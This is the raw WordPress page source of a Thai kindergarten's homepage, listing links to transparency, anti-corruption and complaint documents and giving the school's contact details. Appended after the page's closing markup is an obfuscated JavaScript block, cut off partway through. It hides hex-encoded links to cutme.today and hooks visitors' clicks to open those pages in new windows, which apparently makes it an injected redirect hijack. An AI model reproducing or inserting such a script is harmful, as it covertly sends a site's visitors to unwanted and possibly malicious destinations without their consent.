-->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 